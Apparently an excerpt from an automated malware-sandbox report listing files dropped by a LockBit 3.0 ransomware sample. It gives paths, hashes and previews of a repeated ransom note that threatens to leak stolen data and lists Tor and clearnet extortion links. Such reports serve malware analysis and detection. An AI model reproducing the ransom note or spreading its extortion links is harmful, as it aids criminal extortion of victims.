Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.976439538259547
                Encrypted:false
                SSDEEP:192:T7gDGvSiOPhhSbC055VozlfNnfX1t/Qrs1LfUpvyt/JTdAekSeo:TkDNhhSbCI5eZBflVaMHdp
                MD5:359B9AB9EFB89E42629A8A730DBEE523
                SHA1:C34F572F7FF1E96635A1FA579F9C0B43750FB667
                SHA-256:BA71B738DDD45FFE955256CA0640CE09E2DCCA700F0B56B82D9CB19221D99C6C
                SHA-512:79CEC50D6ED55CF816F702D6430AAE483CD3E354B826224A2C81B65AF5A9E6C1EF9D24908881CAA46D8447F52C681BEF27882D4B72D0B97DAA691971C0F856B9
                Malicious:false
                Preview:I&.D*Y..l7D.M4....t....~.*.E;.z...D.R\...,%K....U.>....8.u...../).c.?.E...nZ........k.....~g%.J.`f......!..-..h. .W.E_..Z8..1..W7...1.r...x.d.l[.A..._..n::.......3..$dnB.f...#U.."%3.~.K....<.s~wO..L.Nq..D.jA}........k..7..u.K....u.....D.f..IQ.... ...H...r......{...e...!..^[q.....u'%......R..2..Cn. .."....qKUJ..A.H.......exyu.....yT.;....I......Lr.m.wi.U:x'#..2..}.D.v;..0..0e?.%Y6O.8....1....3...\......#..S.0.T.@.f.c:1.,.'....B...l...8.#........$ST.8.W.o^?E...3..O.5.........N.).G..hV%.NV..d.L"O..=........n.#. .%..wL.b.._....;.|..R.nj..S....|.E.Z..!...oL......Iy.R8......l.cJ.,a..wM.[.T.............4Q..d.t.....>J...qa....%&.D.V`=..s#..2....".UO.%...q..->!d..P.T.........Ne......x....*U...!.Q...C..f..0.#{z..;E\...#q.:........&N_W.,.. L#.M..O...D....GV.......>....0..t.....!..Y..OWz.A.q.9"1.i.%...;.........Es.."Q...F].k.....{...IZ .w.C.Cr.9.7./Q.}.euPo...Zw.* ..._Y{...Y.AW(..w8...W...^.O..."....%. ...).wP..g..j..^#:..{S.Y(;.....U.....24.!

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.979822975512664
                Encrypted:false
                SSDEEP:192:d9sDN16adkSjbpeavgb0zk0Anfi7EJfBsRegWhnttiY3o:dgN1XVkkg2k/XfyRxWntX4
                MD5:F631FE71C59B03536A160461E5EC255F
                SHA1:E3BD1A333BEECB6B46DD3A71DD56F386A23A8287
                SHA-256:39D969DC80C276AB4382A86511F06FC356AE3B403CF14DE14129D7059F53E17C
                SHA-512:6D3E31166FD8F6D1EDA4476CD078498552146F0BF615AC3E9C1874B4D59C9048B940FB39B0991FE3C197C085F1D39BB8892B46450E33182CA3169ED250D4FDED
                Malicious:false
                Preview:l.2.e.a{........e/.........._._\.9....*....?Ry.jV..$..J.<.}...w&...n8k)p.8...+..{.0#.n....:...`.JtK....x.....h(..-..[.D}V...?....'....b.......w...F.!But...=.........J..;.BG...Y.g+.LIl.,..+......,..Zp..Wi.F......a..{.F-..z.).N#+....7.!n...V=.8.]|.A....A4Q...*..d.D.~&Ut.....[./jh$.1.e...7...LN..&.....,............6.a...!......1.P.&.........l.P<....\.#......#y.........<(,..=Y.S-..AV......x.8.5......?Y...3....k..we.:...<N. .+i..h.@...2.o..;...?....q\....P..;I?.Q..\s.|.C.........pM|........'.aD..,...~&a....N.6.._..b..[..x.&1.G.}.....T1..M.~..&m.s..j..IH....|l?...XM.H. ..&.`..z....e9...]2p.G......w.."+.....]{...;.......D../.L(..b.O.}.J...mn.i*U..:.v..m.._t....`pg...XR..R.Y.5.....9...8..&....GB..7...z........+..4....x...x}..^.../...[...O).j.ELbC...:.$.[H..L.,'w..4[...9.<e.......*.H..K.{.S....0./......7..c}.0.r.b.>_....y..'C.1Q.x.y..|.:..@.}.&(...8..~ .X,cZ.o..._....\n.bV...@~14r5..;..U.X|>...OMd..=....0_.#.a......4.j.Xy.a3Yk...ez.B~[)-8c.-H

                C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
